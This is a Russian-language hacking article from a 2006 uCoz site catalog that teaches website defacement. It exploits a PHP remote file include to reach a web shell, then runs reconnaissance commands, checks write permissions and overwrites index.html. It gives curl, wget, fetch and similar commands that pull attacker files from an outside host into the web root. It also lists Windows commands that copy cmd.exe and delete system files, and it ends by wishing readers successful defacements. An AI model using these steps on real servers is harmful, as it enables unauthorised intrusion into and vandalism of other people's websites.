Пятница, 2026-08-28, 10:15 PM
SITE LOGO

 Каталог статей

Меню сайта
Форма входа
Категории раздела
Взлом и безопасность [7]
Игры [0]
Железо [0]
Поиск
Наш опрос
Да ?
Всего ответов: 66
Мини-чат
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • FAQ по системе
  • Инструкции для uCoz
  • Главная » Статьи » Взлом и безопасность

    Лицо Дефейса
    Вот решил тоже че-нить написать про дефейс. Ибо недавно сам столкнулся с проблемой ( windows-сервы, но об этом чуть попозже). И так, с чего начать? Допустим,у тебя имеется удаленный веб-шелл ( php-incude, cgi,php-system; cgi-open, нужное подчеркнуть) Короче, главное чтоб был какой-нибудь доступ к серву и его каталогам.

    1. *nix
    Итак, давай разберемся с никсовыми тачками. Тут мне показалось все довольно просто, думаю что и ты без труда все поймешь.
    Допустим некоторый сайт, где ты имеешь веб-шелл через пхп-инклуд ошибку. Назовем его http://localhost/index.php?open=http://for...packer.php?cmd= (где http://forattack.narod.ru/packer.php - путь к твоему сайту с залитым скриптом, подробнее можно почитать тут). Для начала собирем некоторую инфу о сервере и о расположении корневого каталога с html. Для этого придаем cmd значения uname -a; pwd; whoami; id; ps -aux. Для тех, кто не знает значения никсовых комманд - читать врезку.

    ==============================================
    uname -a - выдает название ОСи серва, с установленными на нее сервисами (версия php и т.д). Очень пригодится потом: если права будут nobody и без прав записи - можно будет поискать сплоит на сайтах типа секьюритилаб.ру, которые повысят твои права.

    pwd - с помощью этой команды, можно узнать расположение корневого каталога с html, жизненно необходимо.

    whoami - узнаем свою учетную запись. А вдруг мы root?

    id - смотрим свои права.

    ps -aux - показывает список процессов системы. Можно косвенно проверить есть ли администратор в системе

    which - поиск по серву ( например which curl; which perl)

    echo > имя_файла - запись, с перенаправлением в файл ( например echo qwerty > index.html)

    cp имя_файла имя_файла1 - копирование

    rm имя_файла - удаление

    ls -la имя_каталога - отображает нужный каталог

    cat имя_файла - открывает для чтения файл

    cd - выбираем папку для последующего использования

    ==============================================

    Итак, вся необходимая инфа собрана. Лезем в корневой каталог. Допустим pwd тебе выдало нечто вроде home/www/public_html/cgi-din/fuck.cgi - здесь корень будет home/www/public_html.
    Сразу смотрим права на запись в эту папку (юзай статью из нашей рассылки, мы об этом уже писали). Делается это командой ls -la home/www/public_html.
    Допустим тебе повезло и есть право на запись в корневой каталог (благо, что таких сайтов 80%, это по личному опыту )
    Дальше собственно все дело в шляпе. Можно не гемороиться и самоутвердитmся всего лишь одной командой echo 0wn3d by v4$jA > home/www/public_html/index.html. Ну а если захочтеся погемороится, подключив свою собстеввную страничку, картинку или даже аплет - читаем далее.
    Чтобы закачать на серв свои файлы - придется прибегнуть к помощи спец. утилит-качалок, установленных на серве. Благо их может быть всего 6 : curl, fetch, links, lynx, get, wget. Поиск утилит осуществляется с помошбю команды which ( например which curl). Для тех, кто не знает синтаксиса утилит - читаем следующую врезку

    ==============================================
    curl --output home/www/public_html/index1.html http://forattack.narod.ru/index.html

    fetch -o home/www/public_html/index1.html http://forattack.narod.ru/index.html

    links -source "http://forattack.narod.ru/index1.html" > home/www/public_html/index.html

    lynx аналогично links

    get http://forattack.narod.ru/index1.html > home/www/public_html/index.html

    wget -o home/www/public_html/index1.html http://forattack.narod.ru/index.html
    ==============================================
    Например установленна утилита curl - тогда набираем в строке:

    cd home/www/public_html/; curl ---output home/www/public_html/index1.html http://forattack.narod.ru/index.html; ls -la

    Итак, ты последовательно выкачиваешь все необходимые файлы. Дальше делаем резервную копию исходного index.html командой cp index.html index.backup.html ( закон доброго скрипткидиса ) И заменяем index.html на свой index1.html. Все, дефейснуто .

    2. win
    Итак, не дай Бог, тебе попался вынь-серв. С ним, имхо , все будет потруднее. Особо распинаться я не буду, ибо сам все толком не понимаю. После часа юзания я.ру - ничего путного не нашел.
    Но общий смысл все тот же, разве что вместо *nix-команд используются вынь-команды. "Незнающие" читают врезку

    ==============================================
    dir c:\ показывает содержание диска c:\

    cp c:\winnt\system32\cmd.exe c:\nteam.exe копирует файл cmd.exe в файл

    c:\nteam.exe

    echo hacked > "index.html" записывает hacked index.html

    rm c:\autoexec.bat удаляет файл autoexec.bat

    del c:\autoexec.bat удаляет файл autoexec.bat

    rmdir c:\popa удаляет папку popa

    netstat выводит список подключений к системе
    ==============================================

    Короче, таким способом выкачиваем все файлы и заменяем на свои. Не знаю почему, но с win-cервами я гемороился больше. Наверно доков по дефейсу страниц nix-систем просто поболе
    На этом можно закончить. Удачных дефейсов

    Категория: Взлом и безопасность | Добавил: Lavrik (2006-11-15) | Автор: Lavrik E
    Просмотров: 587 | Рейтинг: 0.0/0
    Всего комментариев: 0
    Добавлять комментарии могут только зарегистрированные пользователи.
    [ Регистрация | Вход ]